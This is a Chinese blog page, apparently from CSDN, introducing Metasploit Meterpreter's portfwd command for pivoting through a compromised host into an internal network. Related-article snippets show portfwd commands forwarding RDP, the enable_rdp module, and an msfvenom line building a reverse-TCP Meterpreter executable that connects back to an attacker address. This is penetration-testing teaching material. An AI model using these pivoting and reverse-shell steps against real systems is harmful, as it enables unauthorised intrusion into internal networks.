Metasploit Portfwd 端口转发

最新推荐文章于 2023-04-26 18:15:00 发布
最新推荐文章于 2023-04-26 18:15:00 发布
阅读量755 收藏 2
点赞数 1
分类专栏: 隧道应用技术 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_50526465/article/details/117194160
版权

Metasploit Portfwd 端口转发

 

Portfwd简介(端口转发/重定向)

 

Meterpreter  shell中的portfwd命令最常用作透视技术,允许直接访问攻击系统无法访问的机器。在可以访问攻击者和目标网络(或系统)的受损主机上运行此命令,我们可以实质上通过本机转发TCP连接,从而使其成为一个支点。就像使用ssh连接的端口转发技术一样,portfwd将中继与连接的机器之间的TCP连接。

 

操作指令

 

portfwd -h //查看帮助
Usage: portfwd [-h] [add | delete | list | flush] [args]

OPTIONS:
     -L >opt>  要监听的本地主机(可选)
     -h        帮助
     -l >opt>  要监听的本地端口
     -p >opt>  要连接的远程端口
     -r >opt>  要连接的远程主机

image-20210518224830766.png

开启代理

 

映射80端口

meterpreter > portfwd add -l 8888 -p 80 -r 10.
最低0.47元/天 解锁文章
「已注销」
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Metasploit Portfwd端口转发/重定向)
干铮的博客
03-23 936
Metasploit Portfwd端口抓发 获取meterpreter的shell后可进行端口转发操作,可以使用portfwd -h 转发入侵机器的端口。 先获取目标主机的shell建立连接 使用enable_rdp模块开启目标的远程连接 run post/windows/manage/enable_rdp portfwd add -l 3389 -p 3389 -r 192.168.28.131 rdesktop 127.0.0.1:3389 ...
内网渗透——Metasploit的代理转发
m0_65544268的博客
07-10 653
计算机配置==》管理模块==》网络==》Lanman工作站==》启用不安全的来宾登录。7)使用proxychains4测试访问主机2上的IIS。win10/11有可能没有打开服务,导致无法访问共享。lhost: 0.0.0.0 指定主机2本机地址。3)被攻击主机1运行生成的1111.exe文件。这样我们就实现了第一个主机上线的过程了。2)在已经上线的主机1上创建代理转发功能。出现这样的页面就说明添加路由成功了。这样我们就实现了三台主机上线了。10)主机2运行2222.exe。
portfwd使用
cxk
07-01 2163
一款内置于msf的工具 靶机 win7 192.168.5.101 攻击机 win 10 192.168.0.31 攻击机 kali 192.168.5.102 先配置msf,并反弹会话 转发,把win7 3389转发到kali的33333端口 portfwd add‐l 33333 ‐r 192.168.5.101 ‐p 3389 使用win10 远程桌面功能访问kali的52端口,既访...
portfwd 端口转发
ailx10
07-23 840
前面我们已经学习了ssh端口转发、防火墙端口转发、rinetd端口转发、nc端口转发、socat端口转发、portmap端口转发,今天我们来学习portfwd端口转发portfwd 是meterpreter 中的一个功能,那么本次实验就先来制造一个小马,然后基于meterpreter的portfwd,实现远程端口转发,访问跳板机kali的1111端口,就能访问内网win7的3389端口,这也叫3...
20200503web渗透学习之内网渗透端口转发/映射portfwd
qq_45290991的博客
05-03 689
这几天51放假,但是在忙泰迪杯,选了C题目就是草呀(一种植物) 一、原理 原理层面大佬已经写得很好了:https://xie1997.blog.csdn.net/article/details/103528138?utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromMachineLearnPai2%7Edefault-2.control&depth_1-utm_source=distribut
Metasploit 中文手册.pdf
06-27
Metasploit软件帮助安全专家和 IT 专家识别安全问题、验证漏洞修复情况,并管理由专家执行的安全评估。 该产品提供真正的安全风险智能,帮助用户保护数据抵御攻击。 本 POC 指南的内容涉及智能入侵测定、密码审计、...
metasploitframework框架
09-28
metasploit-framework-V6.1.8适用于Windows系统。 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。
metasploit-framework-6.3.34.zip
最新发布
09-17
1. 信息收集:首先,用户需要通过扫描工具(如Nmap)获取目标系统的开放端口和服务信息。 2. 漏洞扫描:Metasploit的模块库可以对这些信息进行分析,找出可能的漏洞。 3. 模块选择:根据扫描结果,选择合适的漏洞...
Metasploit教程
06-07
Metasploit教程Metasploit教程Metasploit教程Metasploit教程
metasploit
12-19
后渗透的多种方法,meterpreter 在获取shell之后,如何持续控制目标主机,即在目标主机重启或下次开机后能自动连接到攻击主机上,不必每次都需要进行攻击取得 meterpreter。
内网安全之:Metasploit 跳板攻击:portfwd 端口转发端口映射
f_carey的博客
09-03 2808
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Metasploit 中的端口转发端口映射Metasploit portfwd 原理2 实验环境2.1 建立 meterpreter 反向连接2.2 portfwd 端口转发2.3 portfwd 端口映射 Metasploit portfwd 原理 portfwd 是借用 meterpreter s.
红队隧道应用篇之MsfPortfwd端口转发(三)
xf555er的博客
12-08 1079
Meterpreter shell中的portfwd命令最常用作透视技术,允许直接访问攻击系统无法访问的机器, 例如不出网的内网主机, 前提是你要有一个此内网网段的能出网的主机的Meterpreter shell: 增加端口转发: 删除指定的端口转发: 查看端口转发列表: 清除所有的端口转发-: 监听的本地主机, 默认为127.0.0.1: 查看帮助: 监听的本地端口: 连接的目标端口: 连接的目标IP新增一个端口转发记录, 将本地的8080端口数据转发至内网主机的80端口, 也可以说成将内网主机的80端
端口转发_基于 Portfwd 端口转发
weixin_33456137的博客
12-12 323
文章作者:Micropoor原文链接:https://micropoor.blogspot.comportfwd是一款强大的端口转发工具,支持TCP,UDP,支持IPV4--IPV6的转换转发。并且内置于meterpreter。其中exe单版本源码如下:https://github.com/rssnsj/portfwd攻击机: 192.168.1.5 Debian靶机...
内网Metasploit映射到外网
weixin_30703911的博客
09-03 1220
下载frp Github项目地址:https://github.com/fatedier/frp 找到最新的releases下载,系统版本自行确认。 下载方法: wget https://github.com/fatedier/frp/releases/download/v0.16.1/frp_0.16.1_linux_amd64.tar.gz tar zxvf frp_0...
Meterprete端口转发
qq_38409397的博客
11-04 457
Meterpreter中有一个命令,可以替代lcx,nc等来解决大部分端口转发问题; 命令:portfwd 攻击机:kali 10.10.1.104 靶机:windowsxp 10.10.1.103 靶机打开3389端口方便验证 #portfwd 拿到目标机的meterpreter shell 生成一个木马 root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.104 LPORT=4444 -f exe > she
Meterpreter内网穿透
快吃小蛋糕吧的博客
11-06 3298
本文转载自https://www.freebuf.com/articles/network/125278.html 本文实操部分均为本人复现 纵深防御也被被称之为“多层防御”,这样的概念被运用于“信息安全”上。以多层电脑安全技术去减轻其风险,在其中有些电脑被入侵或是泄密时,风险可以大大降低。举例来说,防毒软件被安装于个人工作站上,电脑中病毒在防火墙与服务器等其它类似环境中被拦劫下来。在信息技术世界中占据着举足轻重的地位。本文我们将通过示例分析攻击者是如何运用各种方法进行网络穿透的。 何谓路由 确定设备如.
基于Portfwd端口转发
weixin_44216796的博客
01-17 264
简介 Portfwd是一款强大的端口转发工具,支持TCP,UDP,支持IPV4--IPV6的转换转发。并且内置于meterpreter。其中exe单版本源码地址 实验环境 攻击机: 192.168.159.137 Debian(Kali) 靶 机: 192.168.159.131 Windows 2003 靶机IP为:192.168.159.131—windows 2003—x64 需要转发端口为:3389 portfwd add -l 33389 -r 192.168
渗透测试之内网渗透(四):端口转发
m0_74131821的博客
04-26 1908
在真实的错综复杂的企业环境中进行内网渗透,涉及内网穿透,端口转发,域渗透,提权等一系列的难题
Metasploit工具使用(下)
剁椒鱼头没剁椒的博客
01-30 1672
The Metasploit Framework 的简称。MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值